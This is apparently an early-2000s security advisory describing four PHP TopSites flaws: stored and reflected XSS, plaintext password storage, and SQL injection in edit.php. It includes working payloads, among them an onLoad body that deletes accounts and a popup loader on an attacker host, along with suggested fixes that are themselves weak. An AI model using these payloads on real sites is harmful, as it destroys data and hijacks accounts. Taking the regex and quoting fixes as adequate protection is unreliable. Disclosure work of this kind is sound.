Multiple PHP Topsites Vulnerabities found

PHP TopSites is a PHP/MySQL-based customizable TopList script. Main
features include: Easy configuration config file; MySQL database backend;
unlimited categories, Site rating on incoming votes; Special Rating from
Webmaster; anti-cheating gateway; Random link; Lost password function;
Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-
Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.
http://www.itop10.net/products/

The thousands of sites that use PHP Topsites are strongly advised to
upgrade, fix or discard their phptopsites scripts.



Vulnerability 1.

Critical XSS Vulnerability in all versions of PHP TopSites

Version: All
Script: Add.php
Because PHP TopSites does not have session authentication, it allows an
attacker to use an XSS vulnerability to do things like delete, edit, and
change user accounts by having an unknowing admin run the code. By putting
the following in the description field when adding a new website to any
particular topsite, it's almost impossible for any admin not to run the
following code (unless they have customized browser security settings).
The following code is executed when the admin loads the page. He has to
do nothing but load the page in order to validate a site and the integrity
of the database can be destroyed as the code is never parsed out of the
field and the page does not display it, it executes it. Below are a few
examples - placed into the description field when adding a new site.

<body
onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/sedi
tor.php?sid=siteidnumber&a=delete'">

This code will effectively delete the user account with the site id number
as soon as the admin loads the page.

<body onLoad="window.open('http://attackerswebsite/launcher.htm')">

Using this code, an attacker can open a popup window to a page on his site
that contains code for several more popup windows. Each window can be
used to delete a site from the PHP TopSites database. This method can
totally erase a TopSites database as soon as the admin loads the page.

To fix this vulnerability open add.php and find:

if (!$name) { $err.= "Please enter your name.<BR>"; }
if (!$passw) { $err.= "Please enter password.<BR>"; }
if (!$email) { $err.= "Please enter your email address.<BR>"; }
if (!$title) { $err.= "Please enter site title.<BR>"; }
if (!$url) { $err.= "Please enter site url.<BR>"; }
if (!$banner_w) { $err.= "Please enter banner width.<BR>"; }
if (!$banner_h) { $err.= "Please enter banner height.<BR>"; }
if (!$description) { $err.= "Please enter site description.<BR>"; }
if (!$category) { $err.= "Please enter site category.<BR>"; }
if (check_email_addr($email) == 0) { $err.= "Please enter valid email
address.<BR>"; }

Below it paste:

///////////////////////////////////////////////////////////////////////////
////////////////////////
// Critical XSS Vuln Fix By JeiAr = (jeiar@kmfms.com) January 12 2003 -
All Versions PHP Topsites //
///////////////////////////////////////////////////////////////////////////
////////////////////////

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $name)) {$err.= "Please enter A
valid Name.<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $passw)) {$err.= "Please enter A
valid Password<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $title)) {$err.= "Please enter A
valid Title<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $linkback)) {$err.= "Please enter A
valid Linkback<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $url)) {$err.= "Please enter A
valid URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_url)) {$err.= "Please enter
A valid Banner URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_w)) {$err.= "Please enter A
valid Banner Width<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_h)) {$err.= "Please enter A
valid Banner Height<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $description)) {$err.= "Please
enter A valid Description<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $category)) {$err.= "Please enter A
valid Category<BR>";}
///////////////////////////////////////////////////////////////////////////
/////////////////////////




Vulnerability 2.

XSS Vulnerability in all versions of PHP TopSites

Version: All
Script: help.php
Because PHP TopSites does not have session authentication, it allows an
attacker to use an XSS vulnerability steal cookies or other user-supplied
information. The page being generated with unvalidated input from
untrustworthy sources causes this vulnerability. The developer is urged to
implement session authentication into this script. The following example
lies in the help.php file.

http://somewebsitesite/TopSitesdirec...cript&gt;alert
(document.cookie)&lt;/script&gt;




Vulnerability 3.

Plaintext Password Disclosure Vulnerability in all versions of PHP
TopSites

Version: All
Script: seditor.php
No current versions of PHP TopSites encrypt user passwords, and these
plaintext passwords can be viewed by anyone with access to the admin panel
or edit.php page. Any Topsite Admin (or intruder) can possibly use the
user supplied password to try and compromise the security of the user
supplied website and or the user supplied email account. So anyone signing
up for a TopList using PHP TopSites should keep this in mind, and it
should also be noted to anyone using the same password for everything,
that this is generally not a very good habit to have. This vulnerability
affects all versions. A suggestion to the developer would be to crypt the
passes via md5, and not allow the password to be displayed to an admin
when editing a TopList user(s).




Vulnerability 4.

PHP TopSites User Account Compromise Vulnerability in All Pro versions and
in 1.xx Free versions

Version: All Pro Versions and Free Versions 1.xx
Script:edit.php
This is exploitable because of two conditions in the PHP/MYSQL
configuration. Firstly, register_globals parameter is on in php.ini, which
automatically turns every variable into a global variable. Secondly, the
underlying database is MYSQL, which does not require numeric criteria in
the SQL statement to be quoted. This allows an attacker to bypass the
magic_quoted_gpcs protection in PHP manipulating numeric parts of a query.
It is possible for an attacker to use SQL injection to expose all user
account details for any user he or she knows the id number of. All site ID
numbers of a particular Top List are made available on the index.php page.
The vulnerable code resides

in edit.php. Examples are listed below.

http://examplewebsite.com/topsitesdirectory/edit.php?
a=pre&submit=&sid=siteidnumber--

This injection negates the use of a password and provides access to the
TopList edit page. All information about a particular site can be viewed
and edited from this page. One thing to note, the password is displayed
as plaintext on this page also. All users of the 1.XX Free script(s) are
urged to upgrade their scripts as soon as possible. If you are not able to
upgrade, the below code should serve as a quick fix.

In the Edit.php file change:
$query = mysql_db_query ($dbname,"Select * from top_user Where sid=$sid
AND password='$passw'",$db) or die (mysql_error());

to:

$query = mysql_db_query ($dbname,"Select * from top_user Where
sid='$sid'AND password='$passw'",$db) or die (mysql_error());


In conclusion, the vulnerabilities in this script make it very easy for an
attacker to exploit. The vulnerabilities present in this script compromise
the security of user accounts, the integrity of the data in the database,
and the security of the server it is hosted on. All administrators that
are currently using this script in their websites are strongly urged to
patch or upgrade the PHP TopSites script. Some versions, such as the Pro
version, have no developer upgrades or patches available at the time of
this writing, so they are still vulnerable to the attacks mentioned above.

All Credits go to the CyberArmy Application and Code Auditing Team and
CyberArmy Security Research